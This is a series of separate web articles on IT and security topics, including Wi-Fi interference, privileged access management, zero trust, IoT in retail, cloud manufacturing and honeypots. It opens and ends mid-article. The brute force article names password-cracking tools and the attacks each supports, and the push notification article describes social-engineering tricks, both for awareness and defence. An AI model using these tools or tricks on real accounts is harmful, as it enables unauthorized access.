Deploy 5GHz wireless LANs. Most potential for RF interference today is in the 2.4 GHz band (i.e., 802.11b/g). If you find that other interference avoidance techniques don’t work well enough, then consider deploying 802.11a or 802.11n networks. In addition to avoiding RF interference, you’ll also receive much higher throughput.
The problem with RF interference is that it will likely change over time. For example, a neighbor may purchase a cordless phone and start using it frequently, or the use of wireless LANs in your area may increase. This means that the resulting impacts of RF interference may grow over time, or they may come and go. As a result, in addition to suspecting RF interference as the underlying problem for poor performance, investigate the potential for RF interference in a proactive manner.
Don’t let RF interference ruin your day. Keep a continual close watch on the use of wireless devices that might cause a hit on the performance of your wireless LAN.
Author Biography: Jim Geier provides independent consulting services and training to companies developing and deploying wireless networks for enterprises and municipalities. He is the author of a dozen books on wireless topics, with recent releases including Deploying Voice over Wireless LANs (Cisco Press) and Implementing 802.1x Security Solutions (Wiley).
Courtesy of Wi-Fi Planet | <urn:uuid:1d19d485-fac0-4f49-a1ac-13161501ebd9> | CC-MAIN-2022-40 | https://www.datamation.com/networks/minimize-wlan-interference/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00362.warc.gz | en | 0.91931 | 1,694 | 2.65625 | 3 |
What Is PAM?
Privileged access management (PAM) is a system that assigns higher permission levels to accounts with access to critical resources and admin-level controls. PAM is based on the principle of least privilege, which is crucial to modern cybersecurity best practices.
Least privilege means making sure that users, programs, or processes have the bare minimum level of permission they need to perform their job or function. Users are only given access to read, write, or execute the documents or resources they require for their role. Least privilege can be used to restrict access controls to applications, devices, processes, and systems. Control can also be role-based, such as applying specific privileges to business departments like human resources, IT, and marketing, or based on factors like location, seniority, or the time of day.
Privileged accounts are especially lucrative to cyber criminals. Such accounts have access or permission to resources and systems that contain highly confidential or sensitive information, They can make administrative changes to applications, IT infrastructure, and systems, and organizations use them to install hardware, make infrastructure updates, and reset passwords.
As a result, they present a serious security risk to organizations. Cyber criminals are especially interested in targeting privileged account credentials, which creates a pressing need for organizations to protect them.
There are many types of privileged accounts. Human privileged accounts include super users, domain administrators, local admins, emergency accounts, and privileged business users. It also includes non-human accounts, such as application and service accounts and secure socket shell (SSH) keys.
PAM encompasses privileged identity management (PIM), which lets organizations monitor and protect superuser accounts.
Privileged access is the process of designating higher access levels to certain files or systems. It enables organizations to secure applications and IT infrastructures, run their business more efficiently, and ensure their sensitive data and most critical infrastructure remain confidential. Privileged access can be applied to both human users and non-human users, such as applications and machines.
Privileged credentials, or privileged passwords, are the login details protecting privileged accounts and critical systems, which include applications, human users, and service accounts. A good example of privileged credentials is SSH keys, which are used to access servers and highly sensitive assets.
Privileged accounts are among the biggest targets for cyber criminals and consequently are one of the main sources of data breaches. Forrester Research insight suggests that 80% of breaches involve privileged credentials. Many major data breaches, such as the 2013 Target attack, were found to be a result of stolen credentials and could have been prevented if the organization had restricted access permissions.
Why PAM Is Needed
Privileged access management solutions are crucial to protecting the privileged accounts that exist across businesses’ on-premises and cloud environments. Privileged accounts often hold the key to confidential and sensitive information that can be hugely damaging for organizations if they fall into the wrong hands.
Privileged accounts are especially vulnerable because of the following risks and challenges:
Privileges Are Over-Distributed
It is easy for organizations to overprovision account privileges to resources that do not need them. Some users also end up accumulating new privileges or retaining privileges they no longer need when their job role changes. This privilege excess, in addition to the growth of cloud adoption and digital transformation, can lead to the organization’s attack surface expanding.
Having admin account privileges beyond what users require increases the risk of exposure to malware and hackers stealing their passwords. This allows unauthorized entities to access all privileges across an account, including all the data on an infected computer, or launch an attack against other computers or servers on the network.
Account and Password Sharing
Privileged credentials for services like Windows Administrator are often shared so that duties and workloads can be amended as required. But sharing passwords can make it impossible to associate malicious actions to a single user, which creates issues around auditing, compliance, and security.
Lack of Privilege Visibility
It is common for growing organizations to have old privileged accounts that are no longer used sprawled across their systems. For example, accounts belonging to former employees can be abandoned but still retain privileged access rights. These dormant accounts are vulnerable to hackers and can provide them with a backdoor into organizations’ networks and systems.
Organizations therefore need to retain full visibility of their account access levels and remove any with unnecessary privileges.
Inconsistent Credential Enforcement
Silos within organizations can result in inconsistent privileged accounts enforcement and credential management. Large organizations may have thousands or even millions of privileged accounts, which is impossible for IT teams to manage manually. Furthermore, with so many accounts to manage, shortcuts are likely to occur and credentials can be re-used across multiple accounts. These factors jeopardize the security of all the accounts in the system.
Complex Compliance Requirements
PAM security enables risk management around applications, network devices, and systems and helps organizations record all activities relating to critical infrastructure. This is ideal for creating a more audit-friendly IT environment.
How Does PAM Security Prevent Cyberattacks?
PAM tools are crucial to increasing security, protecting businesses from hackers, and preventing cyberattacks.
Like all people, privileged users, such as domain administrators, struggle to remember passwords across their various account logins. They are also a major target for cyber criminals, which means they especially need to use strong passwords and not recycle credentials over different accounts. PAM solutions monitor privileged accounts and store them in a digital vault to reduce the risk of cyberattacks.
A privileged access management solution reduces the need for users to remember multiple passwords and allows super users to manage privileged access from one location, instead of using multiple applications and systems. It also helps organizations prevent insider attacks by former employees with access rights that have not been effectively deprovisioned. Alerts and session management also allow super admins to identify threats in real time.
Another key advantage is that it ensures compliance with ever-stringent data and privacy regulations. PAM encourages organizations to restrict access to sensitive data and systems, require further approvals, and deploy additional security tools like multi-factor authentication (MFA) on privileged accounts. PAM auditing tools also provide businesses with a clear audit trail, which is crucial to meeting regulations like the EU General Data Protection Regulation (GDPR), the Federal Information Security Management Act (FISMA), and the Health Insurance Portability and Accountability Act (HIPAA).
How Is PAM Different from Identity Access Management (IAM)?
PAM is a subset of IAM, which is a framework of processes, policies, and technologies that allow organizations to manage their digital identities. With IAM, organizations can authenticate and authorize all of their users—including internal employees, external customers, partners, and vendors—across their entire attack surface and tools like Active Directory.
PAM systems are specifically focused on managing and securing administrators and users with elevated privileges.
IAM Can Strengthen PAM Solutions
Organizations must deploy and integrate both IAM and PAM to effectively prevent cyberattacks. Integrating them reduces security risks, improves user experience, and is listed as a requirement by auditors and regulators. Other tools that are crucial to IAM, such as MFA, can be used for secure access, which is necessary to meeting compliance requirements set out by standards like the Payment Card Industry Data Security Standard (PCI DSS).
Using IAM as the interface also improves privileged users’ experience. It enables them to access PAM from the same location they use to access all other corporate resources. Furthermore, IAM enables organizations to automatically terminate privilege access when users leave the organization, which is not always the case with privileged access management tools.
How Fortinet Can Help
The Fortinet IAM solutions allow organizations to securely confirm their users and devices when they enter the corporate network. It also enables them to control and manage identities and ensure only the right users have access to the right resources.
The solution includes FortiAuthenticator, which prevents unauthorized access to resources. Combined with FortiToken and FortiToken Cloud, the Fortinet IAM tool provides further confirmation of user identities and enables MFA processes and management. All these help organizations address the common challenges that companies face in the evolving threat landscape. | <urn:uuid:9a8c5ab0-b8a6-4a32-8e2d-2d515f46f686> | CC-MAIN-2022-40 | https://www.fortinet.com/tw/resources/cyberglossary/privileged-access-management | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00362.warc.gz | en | 0.930123 | 1,701 | 3.25 | 3 |
Cybersecurity and Healthcare have a lot in common which isn’t immediately visible to the average eye. Take, for instance, the ‘Response Plan’ in case of an incident. Identification of the breach is usually the first step in case of a cybersecurity incident. This is followed by containment, eradication, and recovery. Similarly, a Health incident response plan is brought into effect after the identification of Patient or Ground Zero. Then the patient is quarantined to contain the further spread of the pathogen followed by efforts to eradicate the disease.
Today, the two fields have been brought to the forefront of global discourse for all the wrong and most tragic reasons. In the process, a new, indirect link between them has been exposed. As we all know, the novel Coronavirus, apparently having jumped from animals to humans, has taken the lives of more than 100,000 people. This spectacle of death has forced all of humanity to suspend all daily activities and stay at home. To ensure undisrupted productivity, however, enterprises have been forced to ask employees to work remotely. This has been enabled by the growth of technologies such as the Internet and cloud-based services over the past decade. With remote work being the new normal for now, cybersecurity has never been a greater issue. The average employee is susceptible to innumerable malicious attacks as he accesses sensitive company data with multiple insecure devices. The fear the common man has for the novel Coronavirus is also being exploited by malicious actors through phishing campaigns and whatnot. Overall, Cybersecurity issues have come to the fore as never before.
Traditionally, a remote worker uses a VPN to establish access to the corporate network. VPN’s are intended to secure the connection and at the same time grant access. However, there is an issue with VPN’s in particular and the current enterprise security architecture, at large: Trust. With a single pair of credentials obtained unlawfully, someone can lay siege to the entire corporate network. This is because the network considers anything or anyone within the perimeter (usually firewall) of the network to be trustworthy. A typical Castle and moat situation. Once within the perimeter, a malicious actor can go into reconnaissance mode and take down the entire network system by system.
So, if the trust is the issue here, why not eliminate it? Don’t trust anybody, within or without the firewall. This suggestion might sound crude. It is the equivalent of asking the television to be destroyed just because you couldn’t tune into a channel. But this idea, called the Zero Trust Security Model, has gone on to become one of the hottest topics in Cybersecurity.
Zero Trust is a security strategy founded on a set of concepts and ideas which collectively suggest only one thing: No one is to be trusted. In a classical network, trust is placed upon the user with the login credentials and access is granted. For all good reasons, this ‘user’ might be with stolen credentials. This will result in end-point data theft. Hence, the system must treat each user with Zero Trust. The security plan developed for an organization with this basic principle in mind is known as the Zero Trust Architecture.
Zero Trust Architectures may be deployed in different ways. One usual implementation is where the identity of the user and the device is considered. Additional data such as device certificates are also taken into account. The credentials are checked and cross-verified before access is granted to resources. Any discrepancies in the data usually limit the access granted to the user. The simplest form of such a model is the now ubiquitous and heavily in-demand Multi-factor Authentication (MFA) system.
Another popular implementation involves Micro-segmentation of resources with the use of Next-Generation Firewalls as gateways. This model identifies the key resources of the organization and a layer of protection is created around those resources. Simply put, each resource has its own shield against threats.
Zero Trust Networks can be built using technologies that are already in common use today. RSA Certificates for Encryption, Multifactor Authentication Systems are some examples. In fact, most public SaaS offerings are already Zero Trust configured. So, if you use cloud services such as Office 365, you may already partly be Zero Trust ready.
Cloud security is a major issue that the Zero Trust Architecture is expected to solve. Most enterprises, these days, deploy their applications and systems in different settings. While some may be hosted in the private data centre, others may be present in public or hybrid clouds. Different security measures are adopted for each deployment. This can cause a headache to the Information Security Personnel and leave in its wake a fragmented security architecture. A solid Zero Trust Architecture needs to be implemented in such a setting.
Transitioning a large enterprise that is highly dependent on legacy access control systems to a Zero Control Architecture is definitely a huge ask. It requires the combined efforts of people from all walks of corporate life: right from the CISO to System Administrators. But the benefits that an enterprise will reap by investing in Zero Trust is huge. MFA and Single Sign On (SSO) will enhance the user experience as employees won’t have to jot down their passwords again. Security Administrators will have greater visibility into network traffic. The returns outweigh the initial investment. Major companies such as Google and Coca-Cola have embraced Zero Trust. Even the United States House of Representatives has advocated the use of Zero Trust. While it may be tough making a transition, I anticipate that renewed interest and vigour in Cybersecurity with the widespread adoption of cloud-based Infrastructure services and the ever multiplying commercial solutions will surely make things easier in the near future.
Zero Trust is definitely the security architecture of the future. It can only serve well if companies view Zero Trust not only as a technological solution, but also as a strategy and, more importantly, a mindset. This approach is important as we march ahead to a future where all devices will be interconnected in the Internet of Things.
The novel Coronavirus so far has made us introspect deeply. Fundamental questions about human nature and society are being asked everywhere as we deeply reflect on what’s important in life. It has also given us the time to appreciate people better. As we celebrate the services of doctors, nurses and all healthcare workers, let us also take the time to appreciate the low-profile Healthcare Sysadmins. | <urn:uuid:6790c1e6-0304-49bc-9b7f-75d1e055f22e> | CC-MAIN-2022-40 | https://blog.admindroid.com/why-having-zero-trust-in-your-cybersecurity-is-a-good-thing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00562.warc.gz | en | 0.958159 | 1,311 | 2.546875 | 3 |
As consumers migrate from physical stores to online stores, it is paramount that players in this industry evolve to match their pace. To do that, eCommerce stores need to seek innovative ways to make consumers’ experiences as enjoyable as possible and enhance their loyalty. This is where the Internet of Things (IoT) comes into play. If you are curious about the uses of the Internet of Things in e-commerce and its meaning, then keep reading to learn more! For more information on the benefits of IoT in eCommerce check EPAM Anywhere blog.
The Internet of Things describes devices with software, sensors, processing ability and other technologies capable of connecting and interacting with other devices over the internet.
Devices with IoT applications exchange data with each other within an internet network which aids the e-commerce companies in these areas below:
The IoT sensors and Radio Frequency Identification tags(RFID) have changed the inventory arrangement approach entirely. These tags and sensors allow the learning of every essential item information like a product’s availability, its expiration date and the type of product, without the need to involve any human.
Concerning customers, the sensor and tag allow them to confirm the product’s availability and aid business owners in monitoring the quality and quantity of an item. Smart shelves make inventory management much easier by inspecting the number of items and placing an order for new batches to refrain the item from being unavailable.
IoT devices ensure detailed and accurate tracking of product journeys in the process of Supply Chain Management. The RFID tags and IoT sensors help businesses stay updated with news about the product, from the location to the conditions. It provides precise arrival time and prevents wrong deliveries.
The devices also allow customers to keep track of the product location and arrival time at their doorstep. It can automate the delivery and shipping processes to avoid issues like missing shipments.
IoT combines company data and personal data to provide customers with customized services. Some Retailers use customers’ social connections to offer more customized activities, information and data integration for homes or individual members to serve their customers better.
For instance, a connected car driver will get offers suited to them. Customers’ purchase choices might be influenced through the customer journey when Internet Of Things app engineers gain better access to consumer behavior insights.
Using IoT in eCommerce, sellers have gained better insight into the process of order fulfilment so they can satisfy their online customer’s needs. For online companies, Internet of Things (IoT) technology keeps track of customers’ orders from the start (the time they are placed) to finish (their arrival at their doorsteps). Retailers can now track all items on the inventory, irrespective of location. And it can also help avoid traffic. GPS trackers are capable of detecting traffic and offering alternative routes.
Data like weather, traffic conditions, employees’ identities and location can be accessed by employing cloud-based technologies such as RFID and GPS and RFID.
Thanks to linked appliances, manufacturers and consumers can enjoy a long-term relationship. For example, printer producers might directly offer printer cartridge replacements. Consumers will then recall the brand’s name even after they stop using the products.
Retailers can also, through IoT, build brand-new business models, like remote monitoring, performance analytics, and predictive maintenance for different items, which can bring in new income streams.
Internet of Things (IoT) allows e-commerce businesses to stand out amongst their rivals. Different companies are using this to gather insights on items that are becoming popular on social media. IoT technology allows retailers to offer a more inclusive shopping experience with increased customization to suit their customers.
It can seamlessly help in tailored marketing and advertising, enabling e-commerce businesses to concentrate on a particular group of consumers. Also, It can accurately discover the different shopping patterns through online browsing and search trends, enabling businesses to sell selected items to their numerous consumers with little or no difficulty.
One of the major implementations of the Internet of Things in e-commerce is utilizing it to discover and eliminate different issues like cart abandonment, missing shipments, low engagement and return rate. This can be achieved by collecting and analyzing data, strengthening supply chain management and improving customer experience.
Performance analytics plays an integral role in ecommerce. With performance analytics, companies can notice if all the units meet their KPIs and when there is an issue with the outflow and inflow of driving patterns, customers’ location, products and other statistics.
IoT technologies can serve as tools for remote assessment of items, forecasting their maintenance, and examining their performance. They assist businesses with extra data regarding the adoption of a product and also prevent breakdowns
if the sensors alert the company that their product is operating poorly, they can put a call through to the customer, notify the customer and volunteer to replace or repair the product to avoid any future difficulties. In case of a stolen or lost item, IoT assists in sending a notification to notify the user.
Thanks to IoT in e-commerce, business solutions and models are being re-strategized, giving way to new ones. Companies can now increase revenue, create compelling use cases and reduce time to market. IoT applications in eCommerce can change the way companies communicate with their consumers all around the globe.
IoT has given rise to eCommerce businesses due to the availability of microchips, sensors and actuators. Consumer experience will keep improving as many gadgets connect to the internet, acquire smart features, and gather more data.
IoT allows companies to see an increase in revenue, track losses and thefts, and customize the customer experience. Simply put, the benefits of the Internet of Things in e-commerce are evolutionary! | <urn:uuid:10f81da7-4c88-476e-9814-e9dd4ba7bb32> | CC-MAIN-2022-40 | https://coruzant.com/iot/10-innovative-uses-of-internet-of-things-in-e-commerce/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00562.warc.gz | en | 0.927858 | 1,168 | 2.78125 | 3 |
What is a Brute Force Attack?
A brute force attack is uses a trial-and-error approach to systematically guess login info, credentials, and encryption keys. The attacker submits combinations of usernames and passwords until they finally guess correctly.
Once successful, the actor can enter the system masquerading as the legitimate user and remain inside until they are detected. They use this time to move laterally, install back doors, gain knowledge about the system to use in future attacks, and, of course, steal data.
Brute force attacks have been around as long as there have been passwords. They not only remain popular, but are on the rise due to the shift to remote work.
Types of brute force attacks
Simple brute force attack
A simple brute force attack uses automation and scripts to guess passwords. Typical brute force attacks make a few hundred guesses every second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and those using common expressions like ‘123456’ or ‘password,’ can be cracked in minutes. However, the potential exists to increase that speed by orders of magnitude. All the way back in 2012, a researcher used a computer cluster to guess up to 350 billion passwords per second.
A dictionary attack tries combinations of common words and phrases. Originally, dictionary attacks used words from a dictionary as well as numbers, but today dictionary attacks also use passwords that have been leaked by earlier data breaches. These leaked passwords are available for sale on the dark web and can even be found for free on the regular web.
Dictionary software is available that substitutes similar characters to create new guesses. For example, the software will replace a lowercase “l” with a capital “I” or a lowercase “a” with an “@” sign. The software only tries the combinations its logic says are most likely to succeed.
Over the years, more than 8.5 billion usernames and passwords have been leaked. These stolen credentials are sold between bad actors on the dark web and used in everything from spam to account takeovers.
A credential stuffing attack uses these stolen login combinations across a multitude of sites. Credential stuffing works because people tend to re-use their login names and passwords repeatedly, so if a hacker gets access to a person’s account with an electric company, there is an excellent chance those same credentials will provide access to that person’s online bank account as well.
Gaming, media, and retail businesses tend to be favorite targets, but credential stuffing attacks are commonly launched against all industries.
Reverse Brute Force Attack
In a regular brute force attack, the attacker starts with a known key, usually a username or account number. Then they use automation tools to figure out the matching password. In a reverse brute force attack, the attacker knows the password and needs to find the username or account number.
Hybrid Brute Force Attack
A hybrid brute force attack combines a dictionary attack and a brute force attack. People often tack a series of numbers – typically four – onto the end of their password. Those four numbers are usually a year that was significant to them, such as birth or graduation, and so the first number is normally a 1 or a 2.
In a reverse brute force attack, attackers use the dictionary attack to provide the words and then automate a brute force attack on the last part – the four numbers. This is a more efficient approach than using a dictionary attack alone or a brute force attack alone.
Traditional brute force attacks try to guess the password for a single account. Password spraying takes the opposite approach and tries to apply one common password to many accounts. This approach avoids getting caught by lockout policies that limit the number of password attempts. Password spraying is typically used against targets with single sign-on (SSO) and cloud-based apps that use federated authentication.
A brute force attack is a numbers game, and it takes a lot of computing power to execute at scale. By deploying networks of hijacked computers to execute the attack algorithm, attackers can save themselves the cost and hassles of running their own systems. In addition, the use of botnets adds an extra layer of anonymity. Botnets can be used in any type of brute force attack.
Motives Behind Brute Force Attacks
Attackers can use brute force attacks to:
- steal sensitive data
- spread malware
- hijack systems for malicious purposes
- make websites unavailable
- profit from ads
- reroute website traffic to commissioned ad sites
- infect sites with spyware in order to collect data to sell to advertisers
The level of technological skill required to launch a credential stuffing attack is extremely low, as is the cost. For as little as $550, anyone with a computer can launch a credential stuffing attack.
How Does a Brute Force Attack Work?
Adversaries use automated tools to execute brute force attacks, and those lacking the skill to build their own can purchase them on the dark web in the form of malware kits. They can also purchase data such as leaked credentials that can be used as part of a credential stuffing or hybrid brute force attack. These lists may be offered as part of a package, in which the seller includes the lists along with the automated tools, as well as other value-adds, such management consoles.
Once the attacker sets up their tools and seeds them with the lists, if relevant, the attack begins.
Brute force attacks can be conducted with botnets. Botnets are systems of hijacked computers that provide processing power without the consent or knowledge of the legitimate user. Like the malware kits mentioned above, bot kits can also be purchased on the dark web. Last year, a botnet was used to breach SSH servers belonging to banks, medical centers, educational institutions, and others.
Brute force attacks are resource-intensive, but effective. They may also be the first part of a multi-stage attack. An example of this is explained in detail on the CrowdStrike blog, examining a case where a brute force attack was part of a multi-step exploit that enabled unauthenticated privilege escalation to full domain privileges.
Tools Used for Brute Force Attacks
Tools, many free, are available on the open internet that work against a wide variety of platforms and protocols. Here are just a few:
- Aircrack-ng: Aircrack-ng is a brute force wifi password tool that is available for free. It comes with WEP/WPA/WPA2-PSK cracker and analysis tools to perform attacks on Wi-Fi 802.11 and can be used for any NIC that supports raw monitoring mode.
- DaveGrohl: DaveGrohl is a brute forcing tool for Mac OS X that supports dictionary attacks. It has a distributed mode that enables an attacker to execute attacks from multiple computers on the same password hash.
- Hashcat: Hashcat is a CPU-based password cracking tool available for free. It works on Windows, Mac OS, and Linux systems, and works in many types of attacks, including simple brute force, dictionary, and hybrid.
- THC Hydra: THC Hydra cracks passwords of network authentications. It performs dictionary attacks against more than 30 protocols, including HTTPS, FTP, and Telnet.
- John the Ripper: This is a free password-cracking tool that was developed for Unix systems. It is now available for 15 other platforms, including Windows, OpenVMS, and DOS. John the Ripper automatically detects the type of hashing used in a password, so it can be run against encrypted password storage.
- L0phtCrack: L0phtCrack is used in simple brute force, dictionary, hybrid, and rainbow table attacks to crack Windows passwords.
- NL Brute: An RDP brute-forcing tool that has been available on the dark web since at least 2016.
- Ophcrack: Ophcrack is a free, open source Windows password cracking tool. It uses LM hashes through rainbow tables.
- Rainbow Crack: Rainbow Crack generates rainbow tables to use while executing an attack. Rainbow tables are pre-computed and so reduce the time required to perform an attack.
What is the Best Protection Against Brute Force Attacks?
Use multifactor authentication
When users are required to offer more than one form of authentication, such as both a password and a fingerprint or a password and a one-time security token, a brute force attack is less likely to succeed.
Implement IT hygiene
Gain visibility into the use of credentials across the environment and require passwords to be changed regularly.
Set up policies that reject weak passwords
Longer passwords are not always better. What really helps is to require a mix of upper- and lowercase letters mixed with special characters. Educate users on best password practices, such as avoiding adding four numbers at the end and avoiding common numbers, such those beginning with 1 or 2. Provide a password management tool to prevent users from resorting to easily-remembered passwords and use a discovery tool that exposes default passwords on devices that haven’t been changed.
Implement proactive threat hunting
Threat hunting can expose the types of attacks that standard security measures can miss. If a brute force attack has been used to successfully enter the system, a threat hunter can detect the attack even though it’s operating under the guise of legitimate credentials. | <urn:uuid:41a82af0-04e9-479c-9eb7-3f8853c833ed> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/brute-force-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00562.warc.gz | en | 0.921392 | 1,957 | 3.5 | 4 |
Malicious Browser Push Notifications
Browser Push Notifications: Push notifications are small permission-based notification messages that notify users of new messages or updated content and have the ability to reach large audiences anywhere at any time. Desktop notifications are visual notifications that appear on your screen alerting you to new messages from visitors in an app, desktop notifications are shown even if you are browsing a different website or tab in another app.
Push notifications act differently then website pop-ups this is because they are independent of sites. Push notifications are associated with web browsers and apps and can be used with both desktop and mobile versions of web browsers.
Mozilla – “Web Push allows websites to notify users of new messages or updated content. While Firefox is open, websites who have been granted permissions can send notifications to your browser and display them on the screen. Users can easily allow or disable notifications and control how these notifications appear.”
The web notification opt-in process
Web notifications are a permission-based marketing channel. Before receiving a web push, users have to opt in to receive them.
The opt-in prompt comes from the user’s web browser. This prompt is called a browser-level opt-in prompt, or browser-based prompt.
Brands can handle the opt-in process in different ways with both the opt-in process and the timing of the opt-in ask.
Push notifications can be really useful when there used correctly to increase conversation rate to a website or app however they can be abused using various social engineering methods. Today we will take a look at some of the methods hackers are using to abuse web push notifications.
Push Notifications can be used to promote spam and misleading content. Recycling blog posts is not a bad thing although, it can become quite annoying seeing the same push notifications promoting the content you have already read.
The Notifications API
Push notifications are handled externally using The Notifications API.
“The Notifications API lets a web page or app send notifications that are displayed outside the page at the system level; this lets web apps send information to a user even if the application is idle or in the background.
Due to the nature of The Notification API, hackers will often target push notification software using various social engineering techniques such as phishing, password reuse, waterhole attacks with their main goal to hijack the account that handles push notifications. This would allow the hacker to potentially send malicious push notifications to all push subscribers externally regardless of whether the website or blog is functioning correctly or is online. If you are sending push notifications to your users make sure that you are using a strong password and 2FA login in your marketing software.
Social Engineering Browser Push Notifications
Hackers have started to target push notifications via social engineering methods. Social engineers have started to abuse push notifications to get more push subscribers by overlaying and embedding convincing permissions buttons inside video and music content tricking users into thinking they are clicking allow to play the video or music on the website or confirm their age.
The Push-notification.tools pop-ups are a social engineering attack that tries to trick users into subscribing to its push notifications so that they can send unwanted advertisements directly to your desktop.
Push notifications can also be abused to gain a better traffic analytics score by recycling content and promoting users back to the website an excessive amount of times. This makes it look as if there have been a lot more recurring users.
Even though a lot of the websites and blogs using push notifications are secured by SSL HTTPS security certificates. Hackers could still send push notifications externally promoting a less secure website that is hosting malicious content or containing malicious code or links to malicious websites that are not encrypted.
Browser Push Notifications and marketing
Often push notifications will not be self-hosted as they can be hard to manage and can cause a lot of performance issues on servers. There are many companies on the market who are offering push notifications for free. How do these companies offer such a lucrative service for free? marketing companies will sell marketable user data to the highest bidder.
There’s a lot of genuine companies that offer push notification services that are transparent when it comes to data they collect. But that is not the case for others always look into the terms and conditions before installing any push notification plugins for your website or blog. | <urn:uuid:879f2ae0-d5ce-42be-adb5-f20d3a7aaa1c> | CC-MAIN-2022-40 | https://hackingvision.com/2019/09/25/malicious-browser-push-notifications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00562.warc.gz | en | 0.905617 | 894 | 2.609375 | 3 |
Cloud Networked Manufacturing
Cloud Computing provides a new way to do business by offering a scalable, flexible service over the Internet. Many organizations such as educational institutions, business enterprises have adopted cloud computing as a means to boost both employee and business productivity. Similarly, manufacturing companies found that they may not survive in the competitive market without the support of Information Technology (IT) and computer-aided capabilities. The advent of new technologies has changed the traditional manufacturing business model. Nowadays, collaboration between dispersed factories, different suppliers and distributed stakeholders, in a quick, real-time and effective manner are significant. Cloud manufacturing, as a new form of networked manufacturing, encourages collaboration in any phase of manufacturing and product management. It provides secure, reliable manufacturing lifecycle and on-demand services at low prices through networked systems.
In the literature, there are various definitions of Cloud manufacturing (CM). For example, Li, Zhang and Chai (2010) defined cloud manufacturing as “a service-oriented, knowledge-based smart manufacturing system with high efficiency and low energy consumption”. In addition, Xu (2012) described Cloud Manufacturing as “a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable manufacturing resources (e.g., manufacturing software tools, manufacturing equipment, and manufacturing capabilities) that can be rapidly provisioned and released with minimal management effort or service provider interaction“. According to Tao and his colleagues (2011), one of the key characteristics of cloud manufacturing is service-oriented. Manufacturing resources and abilities can be virtualized and encapsulated into different manufacturing cloud services such as Design as a service (DaaS), Manufacturing as a service (MFGaaS), Experimentation as a service (EaaS), Simulation as a service (SIMaaS), Management as a service (MaaS), Maintain as a service (MAaaS), Integration as a service (INTaaS). Cloud users can use these services based on their requirements via the wide Internet.
Furthermore, Cloud manufacturing can provide various and dynamic resources, services, and solutions for addressing a manufacturing task. Like Wikipedia, Cloud manufacturing is a group innovation-based manufacturing model. Any person or company can participate in and contribute their manufacturing resources, abilities, and knowledge to a cloud manufacturing service platform. Besides, any company can use these resources, abilities and knowledge to carry out its manufacturing actions. It would seem that within a Cloud manufacturing environment, an enterprise does not need to possess the entire hardware manufacturing environment (such as workshop, equipment, IT infrastructures, and personnel) or the software manufacturing ability (such as design, manufacturing, management, and sales ability). An enterprise can obtain the resources and abilities, and services in Cloud manufacturing platform according to its requirements after payment.
Cloud Manufacturing consists of four kinds of cloud manufacturing service platform which are:
- Public CM service platform: manufacturing resources and abilities are shared with the general public in a multi-tenant environment.
- Private CM service platform: manufacturing resources and abilities are shared within one company or its subsidiaries. It is managed by an organization or enterprise to provide greater control over its resource and service.
- Community CM service platform: manufacturing resources and abilities are controlled and used by a group of organizations with common concerns.
- Hybrid CM service platform: it is a composition of public and private cloud. Services and information which are not critical are stored in Public CM, while critical information and services are kept within the private CM.
Cloud manufacturing consists of technologies such as networked manufacturing, manufacturing grid (MGrid), virtual manufacturing, agile manufacturing, Internet of things and cloud computing. It can reduce cost of production and improve production efficiency, distribution of integrated resources, and resource efficiency.
By Mojgan Afshari
Mojgan Afshari is a senior lecturer in the Department of Educational Management, Planning and Policy at the University of Malaya. She earned a Bachelor of Science in Industrial Applied Chemistry from Tehran, Iran. Then, she completed her Master’s degree in Educational Administration. After living in Malaysia for a few years, she pursued her PhD in Educational Administration with a focus on ICT use in education from the University Putra Malaysia. She currently teaches courses in managing change and creativity and statistics in education at the graduate level. | <urn:uuid:fa6a4a68-5a36-4267-a093-f2dfc1901405> | CC-MAIN-2022-40 | https://cloudtweaks.com/2014/08/cloud-networked-manufacturing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00562.warc.gz | en | 0.94555 | 874 | 2.625 | 3 |
Routers are network devices that connect your network to the internet. When a router receives packets, it reads the network address and decides where to send them. Most people are familiar with home and small office routers, but larger companies might also have enterprise routers which have ports and connect directly to the backbone of the internet.
Scanned Router Information
Lansweeper will retrieve all information it can find from your router, including:
- Manufacturer and Model
- Serial number
- Device description if available
- Network interfaces
When looking for router information, you are usually looking for the network interfaces. Here, Lansweeper shows the different ports and whether they are in use. For each port, Lansweeper will show the description, type, bandwidth, maximum transmission unit (MTU) and of course the IP address. | <urn:uuid:14272cad-a59e-43ac-886b-f3c10450e549> | CC-MAIN-2022-40 | https://www.lansweeper.com/asset/router/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00562.warc.gz | en | 0.913681 | 176 | 3.21875 | 3 |
A smart network security administrator is the one that can gear up all the measures to neutralize threats even before they ever take place. In order to manipulate the events as per their scheme of things, the pros in the field of network security always keep certain decoy systems in their arsenal. One such popular decoy system that can function by enticing targets and misdirect the attackers from their real target are termed as honeypots.
Honeypot can be made with a range of complexities on the grounds of what is actually required by your organization. Honeypot in network security can be a crucial line of defence and here we are going to focus on what different types of honeypots are, what are their benefits and how they are employed?
Honeypots help us in tracing an early sign of attack, what type of information is vulnerable, what are the details of the attackers and what are the methods used by them? Honeypots are well monitored and actually do not contain sensitive data. It helps in analysing TTPs (tools, tactics and procedures) of the attackers and accumulate legal and forensic evidence without putting the real network security at stake.
How a Honeypot Works?
